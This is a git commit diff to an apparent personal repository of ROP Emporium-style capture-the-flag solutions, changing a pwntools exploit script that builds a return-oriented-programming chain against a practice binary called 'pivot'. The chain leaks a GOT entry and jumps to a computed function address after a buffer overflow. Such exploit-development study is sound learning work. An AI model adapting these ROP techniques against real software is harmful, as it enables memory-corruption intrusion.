From 11cbb37694aab501681435375679c49989cdfc91 Mon Sep 17 00:00:00 2001
From: Brett Weiland <techcrazybsw@gmail.com>
Date: Sat, 19 Dec 2020 23:19:58 -0600
Subject: 	modified:   x86_64/pivot/exploit.py 	new file:  
 x86_64/pivot/exploit2.py 	deleted:    x86_64/pivot/stest 	deleted:   
 x86_64/pivot/test 	new file:   x86_64/pivot/todo 	new file:  
 x86_64/ret2csu/exploit.py 	new file:   x86_64/ret2csu/gadgets

---
 x86_64/pivot/exploit.py | 14 +++-----------
 1 file changed, 3 insertions(+), 11 deletions(-)

(limited to 'x86_64/pivot/exploit.py')

diff --git a/x86_64/pivot/exploit.py b/x86_64/pivot/exploit.py
index a46b0cd..2420428 100755
--- a/x86_64/pivot/exploit.py
+++ b/x86_64/pivot/exploit.py
@@ -3,21 +3,14 @@ from pwn import *
 from os import getcwd
 import re
 
-#context.terminal = ['kitty', 'sh', '-c']
-print(context.terminal)
-
-prog = gdb.debug('./pivot', gdbscript='''
-        b pwnme
-        b *0x4009a5
-'''
-
-)
+prog = process('./pivot')
 
 payload = b''
 payload += p64(0x0000000000400720)      # foothold@plt
 
 payload += p64(0x4009bb)                # pop rax
-payload += p64(601040)                  # foothold@plt's .got.plt entry
+payload += p64(0x601040)                # foothold@plt's .got.plt entry
+payload += p64(0x4009c0)                # mov rax, [rax]
 
 payload += p64(0x00000000004007c8)      # pop rbp
 payload += p64(279)                     # should be the offset of pwnem from foothold's .got.plt 
@@ -27,7 +20,6 @@ payload += p64(0x4009c4)                # adds the two
 payload += p64(0x00000000004007c1)      # jmp rax
 prog.sendline(payload)
 pivit_location = int(re.findall('0x[0-9a-z]{12}', prog.readregexS('0x[0-9a-z]{12}'))[0], 16)
-print(hex(pivit_location))
 
 payload = b''
 #buffer overflow
-- 
cgit v1.2.3